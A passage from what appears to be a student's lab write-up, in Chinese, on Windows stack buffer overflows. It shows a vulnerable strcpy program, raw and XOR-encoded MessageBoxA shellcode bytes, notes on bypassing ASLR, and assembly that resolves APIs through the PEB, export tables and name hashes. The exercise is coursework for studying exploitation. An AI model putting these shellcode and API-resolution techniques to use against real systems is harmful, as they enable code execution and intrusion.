class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;windows.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> REGCODE <span class="string">&quot;12345678&quot;</span></span></span><br><span class="line"><span class="type">int</span> <span class="title function_">verify</span> <span class="params">(<span class="type">char</span> * code)</span></span><br><span class="line">&#123;</span><br><span class="line"><span class="type">int</span> flag;</span><br><span class="line"><span class="type">char</span> buffer[<span class="number">44</span>];</span><br><span class="line">flag=<span class="built_in">strcmp</span>(REGCODE, code);</span><br><span class="line"><span class="built_in">strcpy</span>(buffer, code);</span><br><span class="line"><span class="keyword">return</span> flag; </span><br><span class="line">&#125;</span><br><span class="line"><span class="type">void</span> <span class="title function_">main</span><span class="params">()</span></span><br><span class="line">&#123;</span><br><span class="line"><span class="type">int</span> vFlag=<span class="number">0</span>;</span><br><span class="line"><span class="type">char</span> regcode[<span class="number">1024</span>];</span><br><span class="line">FILE *fp;</span><br><span class="line">LoadLibrary(<span class="string">&quot;user32.dll&quot;</span>);</span><br><span class="line"><span class="keyword">if</span> (!(fp=fopen(<span class="string">&quot;reg.txt&quot;</span>,<span class="string">&quot;rw+&quot;</span>)))</span><br><span class="line"><span class="built_in">exit</span>(<span class="number">0</span>); </span><br><span class="line"><span class="built_in">fscanf</span>(fp,<span class="string">&quot;%s&quot;</span>, regcode);</span><br><span class="line">vFlag=verify(regcode);</span><br><span class="line"><span class="keyword">if</span> (vFlag)</span><br><span class="line"><span class="built_in">printf</span>(<span class="string">&quot;wrong regcode!&quot;</span>);</span><br><span class="line"><span class="keyword">else</span></span><br><span class="line"><span class="built_in">printf</span>(<span class="string">&quot;passed!&quot;</span>); </span><br><span class="line">fclose(fp);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p><strong>分析程序代码是否存在漏洞，若存在则</strong></p><h4 id="如何利用漏洞实现执行任意代码（例如弹出一个对话框）？"><a href="#如何利用漏洞实现执行任意代码（例如弹出一个对话框）？" class="headerlink" title="如何利用漏洞实现执行任意代码（例如弹出一个对话框）？"></a><strong>如何利用漏洞实现执行任意代码（例如弹出一个对话框）？</strong></h4><p>Verify函数的缓冲区44个字节，拿过来上课的ppt中栈帧结构，改一下：</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/clip_image002.png" alt="img"></p><p>可以看到这里的漏洞在strcpy</p><p>为了能覆盖返回地址，需要在reg.txt中至少写入：buffer（44字节）+flag（4字节）+前EBP值（4字节），也就是53-56字节才是要淹没的地址。</p><p>MessageBox在第一次实验报告中简单的提及，这里说汇编语言调用MessageBoxA的步骤：</p><p>（1）装载动态链接库user32.dll。MessageBoxA是动态链接库user32.dll的导出函数。虽然大多数有图形化操作界面的程序都已经装载了这个库，但是我们用来实验的consol版并没有默认加载它。</p><p>  （2）在汇编语言中调用这个函数需要获得这个函数的入口地址。</p><p>  （3）在调用前需要向栈中按从右向左的顺序压入MessageBoxA的4个参数。</p><p>  为了让植入的机器代码更加简洁明了，我们在实验准备中构造漏洞程序的时候已经人工加载了user32.dll这个库，所以第一步操作不用在汇编语言中考虑。</p><h5 id="第一步：获得函数入口地址"><a href="#第一步：获得函数入口地址" class="headerlink" title="第一步：获得函数入口地址"></a>第一步：获得函数入口地址</h5><p>有两种方式，第一是根据工具和偏移来计算函数入口（user32.dll 的基地址为0x77D10000，MessageBoxA的偏移地址为0x000407EA。基地址加上偏移地址就得到了MessageBoxA函数在内存中的入口地址：0x 77D507EA。）；另一个方法，使用代码来获取相关函数地址，在C&#x2F;C++语言中，GetProcAddress函数检索指定的动态链接库（DLL）中的输出库函数地址。如果函数调用成功，返回值是DLL中的输出函数地址。函数原型如下：</p> <figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">FARPROC <span class="title function_">GetProcAddress</span><span class="params">(</span></span><br><span class="line"><span class="params">  HMODULE hModule,    <span class="comment">// DLL模块句柄</span></span></span><br><span class="line"><span class="params">  LPCSTR lpProcName   <span class="comment">// 函数名</span></span></span><br><span class="line"><span class="params">)</span>;</span><br></pre></td></tr></table></figure><p>参数hModule包含此函数的DLL模块的句柄。LoadLibrary、AfxLoadLibrary或者GetModuleHandle函数可以返回此句柄。参数lpProcName是包含函数名的以NULL结尾的字符串，或者指定函数的序数值。如果此参数是一个序数值，它必须在一个字的低字节，高字节必须为0。FARPROC是一个4字节指针，指向一个函数的内存地址，GetProcAddress的返回类型就是FARPROC。如果你要存放这个地址，可以声明以一个FARPROC变量来存放。</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;windows.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="type">int</span> <span class="title function_">main</span><span class="params">()</span></span><br><span class="line">&#123; </span><br><span class="line">        HINSTANCE LibHandle;</span><br><span class="line">        FARPROC ProcAdd;</span><br><span class="line">        LibHandle = LoadLibrary(<span class="string">&quot;user32&quot;</span>);</span><br><span class="line">        <span class="comment">//获取user32.dll的地址</span></span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">&quot;user32 = 0x%x \n&quot;</span>, LibHandle);</span><br><span class="line">        <span class="comment">//获取MessageBoxA的地址</span></span><br><span class="line">        ProcAdd=(FARPROC)GetProcAddress(LibHandle,<span class="string">&quot;MessageBoxA&quot;</span>);</span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">&quot;MessageBoxA = 0x%x \n&quot;</span>, ProcAdd);</span><br><span class="line">        getchar();</span><br><span class="line">        <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>运行上述代码后，同样可以得到MessageBoxA函数在内存中的入口地址：0x77D507EA。</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/clip_image004.png" alt="img"></p><h5 id="对应汇编代码"><a href="#对应汇编代码" class="headerlink" title="对应汇编代码"></a><strong>对应汇编代码</strong></h5><p>参考ppt里的函数调用汇编代码：<br> <img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/clip_image006.png" alt="img"></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">Shellcode( push 0的机器码会出现0x00，会造成字符串读取截断。)</span><br><span class="line">_asm&#123;</span><br><span class="line">xor ebx,ebx</span><br><span class="line">push ebx</span><br><span class="line">push ebx</span><br><span class="line">push ebx</span><br><span class="line">push ebx</span><br><span class="line">mov eax,0x77d507ea</span><br><span class="line">call eax</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>机器码：（右下角）</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/clip_image008.png" alt="img"></p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/clip_image010.png" alt="img"></p><p>拿出来，换个格式，很好的替换方法：</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/clip_image012.png" alt="img"></p><h5 id="机器码"><a href="#机器码" class="headerlink" title="机器码"></a><strong>机器码</strong></h5><p>shellcode &#x3D; \x33\xDB\x53\x53\x53\x53\xB8\xEA\x07\xD5\x77\xFF\xD0</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/clip_image014.png" alt="img"></p><h5 id="验证机器代码"><a href="#验证机器代码" class="headerlink" title="验证机器代码"></a><strong>验证机器代码</strong></h5><p>可以运行</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">_asm</span><br><span class="line">&#123;</span><br><span class="line">xor ebx,ebx</span><br><span class="line">push ebx</span><br><span class="line">push 0x797978</span><br><span class="line">mov eax, esp</span><br><span class="line">push ebx</span><br><span class="line">push eax</span><br><span class="line">push eax</span><br><span class="line">push ebx</span><br><span class="line">mov eax, 0x77d507ea </span><br><span class="line">call eax</span><br><span class="line">&#125;</span><br><span class="line">   return 0;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/clip_image016.png" alt="img"></p><p>接下来就可以利用这个Shellcode来实现漏洞的利用了。 </p><h5 id="自己编写调用Messagebox输出自定义字符的Shellcode："><a href="#自己编写调用Messagebox输出自定义字符的Shellcode：" class="headerlink" title="自己编写调用Messagebox输出自定义字符的Shellcode："></a><strong>自己编写调用Messagebox输出自定义字符的Shellcode：</strong></h5><p><strong>根据以上操作，继续</strong></p><p>\x33\xDB\x53\x68\x78\x79\x79\x00\x8B\xC4\x53\x50\x50\x53\xB8\xEA\x07\xD5\x77\xFF\xD0</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/clip_image018.png" alt="img"></p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/clip_image020.png" alt="img"></p><p>神奇。</p><h5 id="加密shellcode"><a href="#加密shellcode" class="headerlink" title="**加密shellcode **"></a>**加密shellcode **</h5><p><strong>这里使用</strong>异或编码</p><p><strong>有些需要注意：</strong>在选取编码字节时，不可与已有字节相同，否则会出现0。</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/clip_image022.png" alt="img"></p><ul><li>很好的和0x07异或，orz哭了</li></ul><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/clip_image024.png" alt="img"></p><p>加密后shellcode：</p><p>\x3B\xD3\x5B\x60\x70\x71\x71\x08\x83\xCC\x5B\x58\x58\x5B\xB0\xE2\x0F\xDD\x7F\xF7\xD8</p><p>动态调试看程序在返回时，需要跳转的位置：</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/clip_image026.png" alt="img"></p><p>往后执行，跳转到高亮的后一个单位0x4012C9，所以需要 ret+1</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/clip_image028.png" alt="img"></p><p>跳过来了</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/clip_image030.png" alt="img"></p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/clip_image032.png" alt="img"></p><p>这里是增加了一个变量int length，导致ret距离main多4字节，也可如图中所示代码修改：</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/clip_image034.png" alt="img"></p><p>Ppt中有提到，直接将shellcode写为 “加密的指令和解密代码的汇编”，感觉会比我的操作更简单一点：</p><p>运行抓到如下程序的机器码：</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/clip_image036.png" alt="img"></p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20250102110456835.png" alt="image-20250102110456835"></p><h2 id="实验四：API自搜索技术"><a href="#实验四：API自搜索技术" class="headerlink" title="实验四：API自搜索技术"></a><strong>实验四：API自搜索技术</strong></h2><h3 id="一．-实验环境-1"><a href="#一．-实验环境-1" class="headerlink" title="一． 实验环境"></a>一． 实验环境</h3><p>Windows10操作系统。</p><h3 id="二．-实验目的-1"><a href="#二．-实验目的-1" class="headerlink" title="二． 实验目的"></a>二． 实验目的</h3><p>\1. 掌握ASLR安全防护机制；</p><p>\2. 掌握API自搜索技术；</p><p>\3. 学会在Windows10环境下弹出对话框需要的步骤。</p><h3 id="三．-实验步骤-1"><a href="#三．-实验步骤-1" class="headerlink" title="三． 实验步骤"></a>三． 实验步骤</h3><h4 id="ASLR安全防护机制："><a href="#ASLR安全防护机制：" class="headerlink" title="ASLR安全防护机制："></a>ASLR安全防护机制：</h4><p>ASLR是地址空间分布随机化的简称，通过将系统关键地址随机化，使得之前硬编码shellcode失效。Shellcode需要调用一些系统函数才能实现系统功能达到攻击目的，而这些函数地址一般为 系统dll、可执行文件本身、栈数据或者PEB（进程环境块）中<strong>固定调用地址</strong>。</p><p>在Windows Vista上，当程序启动将执行文件加载到内存时，操作系统通过内核模块提供的ASLR功能，<strong>在原来映像基址的基础上加上一个随机数作为新的映像基址</strong>。随机数的取值范围限定为1至254，并保证每个数值随机出现。</p><p>ASLR通过增加随机偏移，使得很多攻击变得非常困难。但是，ASLR技术存在很多脆弱性，包括：</p><p>（1）为了减少虚拟地址空间的碎片，操作系统把随机加载库文件的地址限制为<strong>8位</strong>，即地址空间为256，而且随机化发生在地址前两个最有意义的字节上；</p><p>（2）很多应用程序和DLL模块并没有采用&#x2F;DYNAMICBASE的编译选项；</p><p>（3）很多应用程序<strong>使用相同的系统DLL文件</strong>，这些系统DLL加载后地址就确定下来了，对于本地攻击，攻击者还是很容易就能获得所需要的地址，然后进行攻击。</p><p>针对这些缺陷，还有一些其他绕过方法，比如<strong>攻击未开启地址随机化的模块（作为跳板）（利用ESP寄存器特性，返回地址动态定位）、堆喷洒技术（slide code-noooop）、部分返回地址覆盖法</strong>等。</p><h4 id="API自搜索技术"><a href="#API自搜索技术" class="headerlink" title="API自搜索技术"></a>API自搜索技术</h4><p>随着系统版本的变化，很多函数的地址也会随之变化，之前我们采用硬编址的方式来调用API函数，可能调用就失效了，这里我们编写shellcode必须具备动态的自动搜索所学的API函数地址能力，这个就是<strong>API自搜索技术。</strong></p><p>·MessageBoxA位于user32.dll中，用于弹出消息框。</p><p>·ExitProcess位于kernel32.dll中，用于正常退出程序。所有的Win32程序都会自动加载ntdll.dll以及kernel32.dll这两个最基础的动态链接库。</p><p>·LoadLibraryA位于kernel32.dll中，并不是所有的程序都会装载user32.dll，所以<strong>在调用MessageBoxA之前，应该先使用LoadLibrary(“user32.dll”)装载user32.dll</strong>。</p><p>这里是通用型shellcode编写的步骤：（老师上课的ppt）</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20250102111059012.png" alt="image-20250102111059012"></p><p>难点主要在1-3步，</p><h5 id="第一步：定位kernel32-dll位置："><a href="#第一步：定位kernel32-dll位置：" class="headerlink" title="第一步：定位kernel32.dll位置："></a><strong>第一步：定位kernel32.dll位置：</strong></h5><p> <img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20250102111106538.png" alt="image-20250102111106538"></p><p>Ppt中的这个图可以更直观的理解这个流程：<br>  <img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20250102111121227.png" alt="image-20250102111121227"></p><p>如下代码来实现：</p> <figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">int</span> <span class="title function_">main</span><span class="params">()</span></span><br><span class="line">&#123;     _asm</span><br><span class="line">     &#123;</span><br><span class="line">             mov eax, fs:[<span class="number">0x30</span>] ;PEB的地址 </span><br><span class="line">             mov eax, [eax + <span class="number">0x0c</span>] ; PEB_LDR_DATA结构体的地址 </span><br><span class="line">             mov esi, [eax + <span class="number">0x1c</span>] ; 指针InInitializationOrderModuleList </span><br><span class="line">             lodsd  </span><br><span class="line">             mov eax, [eax + <span class="number">0x08</span>] ;eax就是kernel32.dll的地址 </span><br><span class="line">     &#125;</span><br><span class="line">     <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20250102111157457.png" alt="image-20250102111157457"></p><p>获得kernel32.dll的基地址：0x76530000</p><h5 id="第二步：定位kernel32-dll的导出表"><a href="#第二步：定位kernel32-dll的导出表" class="headerlink" title="第二步：定位kernel32.dll的导出表"></a><strong>第二步：</strong>定位kernel32.dll的导出表</h5><p>找到了kernel32.dll，由于它也是属于PE文件，那么我们可以根据PE文件的结构特征，定位其导出表，进而定位导出函数列表信息，然后进行解析、遍历搜索，找到我们所需要的API函数。</p><p>定位导出表及函数名列表的步骤如下： </p><p>（1）从kernel32.dll加载基址算起，偏移0x3c的地方就是其PE头的指针。</p><p>PE头偏移0x78的地方存放着指向函数导出表的指针。</p><p>（2）获得导出函数偏移地址（RVA）列表、导出函数名列表：</p><p>①导出表偏移0x1c处的指针指向存储导出函数偏移地址（RVA）的列表。</p><p>②导出表偏移0x20处的指针指向存储导出函数函数名的列表。</p><p>同样使用ppt中的流程图：<br>  <img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20250102111207494.png" alt="image-20250102111207494"></p><p>定位kernel32.dll导出表及其导出函数名列表的代码如下：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">mov    ebp, eax             //将kernel32.dll基地址赋值给ebp</span><br><span class="line">moveax,[ebp+0x3C]//dll的PE头的指针（相对地址） </span><br><span class="line">movecx,[ebp+eax+0x78]//导出表的指针（相对地址）</span><br><span class="line">addecx,ebp//ecx=0x78C00000+0x262c 得到导出表的内存地址</span><br><span class="line">movebx,[ecx+0x20]//导出函数名列表指针</span><br><span class="line">addebx,ebp             //导出函数名列表指针的基地址</span><br></pre></td></tr></table></figure><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20250102111229603.png" alt="image-20250102111229603"></p><p>dll的PE头的指针（相对地址）：EAX &#x3D; 000000F0</p><p>导出表的指针（相对地址）：ECX &#x3D; 0022D3E0 &#x2F;&#x2F;导出表</p><p>导出表的<strong>内存</strong>地址：ECX &#x3D; 7675D3E0 </p><p>RVA列表：0x0022D408</p><p> <img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20250102111237249.png" alt="image-20250102111237249"></p><p>导出函数名列表指针：<strong>EBX &#x3D; 0022F32C</strong></p><p> <img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20250102111243279.png" alt="image-20250102111243279"></p><p>导出函数名列表指针的基地址：EBX &#x3D; 7675F32C</p><p> <img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20250102111249877.png" alt="image-20250102111249877"></p><h5 id="第三步-搜索定位目标函数"><a href="#第三步-搜索定位目标函数" class="headerlink" title="第三步 搜索定位目标函数"></a><strong>第三步 搜索定位目标函数</strong></h5><p>至此，可以通过遍历两个函数相关列表，算出所需函数的入口地址：</p><p>（1）函数的RVA地址和名字按照顺序存放在上述两个列表中，我们可以在名称列表中定位到所需的函数是第几个，然后在地址列表中找到对应的RVA。</p><p>（2）获得RVA后，再加上前边已经得到的动态链接库的加载地址，就获得了所需API此刻在内存中的虚拟地址，这个地址就是最终在ShellCode中调用时需要的地址。</p><p>按照这个方法，就可以获得kernel32.dll中的任意函数。</p><p><strong>kernel32.dll基地址0x76530000 +函数地址偏移量0x001c9298 &#x3D;LoadLibraryA函数地址0x766F9298</strong></p><p>书中有一张图，和课堂ppt一样，贴过来：<br>  <img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20250102111325450.png" alt="image-20250102111325450"></p><p>为了让shellcode更加通用，能被大多数缓冲区容纳，总是希望shellcode尽可能短。因此，一般情况下并不会“MessageBoxA”等这么长的字符串去进行直接比较。所以会对所需的API函数名进行hash运算，这样只要<strong>比较hash所得的摘要就能判定是不是我们所需的API了。</strong>使用的hash算法如示例5-10所示。</p><h5 id="压缩函数名的hash算法："><a href="#压缩函数名的hash算法：" class="headerlink" title="压缩函数名的hash算法："></a>压缩函数名的hash算法：</h5><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;windows.h&gt;</span></span></span><br><span class="line">DWORD <span class="title function_">GetHash</span><span class="params">(<span class="type">char</span> *fun_name)</span></span><br><span class="line">&#123;</span><br><span class="line">    DWORD digest=<span class="number">0</span>;</span><br><span class="line">    <span class="keyword">while</span>(*fun_name)</span><br><span class="line">    &#123;</span><br><span class="line">        digest=((digest&lt;&lt;<span class="number">25</span>)|(digest&gt;&gt;<span class="number">7</span>)); <span class="comment">//循环右移7位 </span></span><br><span class="line">       <span class="comment">/*   movsxeax,byte ptr[esi]  </span></span><br><span class="line"><span class="comment">    cmpal,ah             </span></span><br><span class="line"><span class="comment">    jzcompare_hash</span></span><br><span class="line"><span class="comment">            ror  edx, 7 ; ((循环))右移,不是单纯的 &gt;&gt;7</span></span><br><span class="line"><span class="comment">    addedx,eax</span></span><br><span class="line"><span class="comment">    incesi</span></span><br><span class="line"><span class="comment">    jmphash_loop </span></span><br><span class="line"><span class="comment">       */</span></span><br><span class="line">        digest+= *fun_name ; <span class="comment">//累加</span></span><br><span class="line">        fun_name++;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> digest;</span><br><span class="line">&#125;</span><br><span class="line">main()</span><br><span class="line">&#123;</span><br><span class="line">    DWORD hash;</span><br><span class="line">    hash= GetHash(<span class="string">&quot;MessageBoxA&quot;</span>);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;%#x\n&quot;</span>,hash);</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>通过上述代码，我们可以获得MessageboxA的hash值。接下来，我们可以在shellcode中通过压栈的方式将这个hash值压入栈中，再通过<strong>比较得到</strong>动态链接库中的API地址。</p><p>完整API函数自搜索代码。首先，基于上述流程找到函数的入口地址；之后，可以编写自己的shellcode，如下面完整代码中的function_call。</p><h5 id="完整API函数自搜索代码："><a href="#完整API函数自搜索代码：" class="headerlink" title="完整API函数自搜索代码："></a>完整API函数自搜索代码：</h5><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;windows.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="type">int</span> <span class="title function_">main</span><span class="params">()</span></span><br><span class="line">&#123;</span><br><span class="line">    __asm</span><br><span class="line">    &#123;</span><br><span class="line">        CLD                         <span class="comment">//清空标志位DF</span></span><br><span class="line">        push   <span class="number">0x1E380A6A</span>           <span class="comment">//压入MessageBoxA的hash--&gt;user32.dll</span></span><br><span class="line">        push   <span class="number">0x4FD18963</span>           <span class="comment">//压入ExitProcess的hash--&gt;kernel32.dll</span></span><br><span class="line">        push   <span class="number">0x0C917432</span>           <span class="comment">//压入LoadLibraryA的hash--&gt;kernel32.dll</span></span><br><span class="line">        mov esi,esp           <span class="comment">//esi=esp,指向堆栈中存放LoadLibraryA的hash的地址</span></span><br><span class="line">        lea  edi,[esi<span class="number">-0xc</span>]           <span class="comment">//空出8字节应该是为了兼容性</span></span><br><span class="line">        <span class="comment">//======开辟一些栈空间</span></span><br><span class="line">        xorebx,ebx</span><br><span class="line">        movbh,<span class="number">0x04</span></span><br><span class="line">        subesp,ebx             <span class="comment">//esp-=0x400</span></span><br><span class="line">        <span class="comment">//======压入&quot;user32.dll&quot;</span></span><br><span class="line">        movbx,<span class="number">0x3233</span>       </span><br><span class="line">        pushebx        <span class="comment">//0x3233       </span></span><br><span class="line">        push<span class="number">0x72657375</span>          <span class="comment">//&quot;user&quot;</span></span><br><span class="line">        pushesp                  </span><br><span class="line">        xoredx,edx          <span class="comment">//edx=0</span></span><br><span class="line">        <span class="comment">//======找kernel32.dll的基地址</span></span><br><span class="line">        movebx,fs:[edx+<span class="number">0x30</span>]   <span class="comment">//[TEB+0x30]--&gt;PEB</span></span><br><span class="line">        movecx,[ebx+<span class="number">0xC</span>]  <span class="comment">//[PEB+0xC]---&gt;PEB_LDR_DATA</span></span><br><span class="line">        movecx,[ecx+<span class="number">0x1C</span>] <span class="comment">//[PEB_LDR_DATA+0x1C]---&gt;InInitializationOrderModuleList</span></span><br><span class="line">        movecx,[ecx]         <span class="comment">//进入链表第一个就是ntdll.dll</span></span><br><span class="line">        movebp,[ecx+<span class="number">0x8</span>]<span class="comment">//ebp= kernel32.dll的基地址</span></span><br><span class="line">        </span><br><span class="line">        <span class="comment">//======是否找到了自己所需全部的函数</span></span><br><span class="line">find_lib_functions:</span><br><span class="line">        lodsd    <span class="comment">//即move eax,[esi], esi+=4, 第一次取LoadLibraryA的hash</span></span><br><span class="line">        cmpeax,<span class="number">0x1E380A6A</span>      <span class="comment">//与MessageBoxA的hash比较 </span></span><br><span class="line">        jnefind_functions  <span class="comment">//如果没有找到MessageBoxA函数，继续找</span></span><br><span class="line">        xchg eax,ebp             <span class="comment">//------------------------------------&gt; |</span></span><br><span class="line">        call[edi<span class="number">-0x8</span>]     <span class="comment">//LoadLibraryA(&quot;user32&quot;)                     |</span></span><br><span class="line">        xchgeax,ebp     <span class="comment">//ebp=userl32.dll的基地址,eax=MessageBoxA的hash  &lt;-- |</span></span><br><span class="line">        </span><br><span class="line">        <span class="comment">//======导出函数名列表指针</span></span><br><span class="line">find_functions:</span><br><span class="line">        pushad                      <span class="comment">//保护寄存器</span></span><br><span class="line">        moveax,[ebp+<span class="number">0x3C</span>]<span class="comment">//dll的PE头</span></span><br><span class="line">        movecx,[ebp+eax+<span class="number">0x78</span>]<span class="comment">//导出表的指针</span></span><br><span class="line">        addecx,ebp<span class="comment">//ecx=导出表的基地址</span></span><br><span class="line">        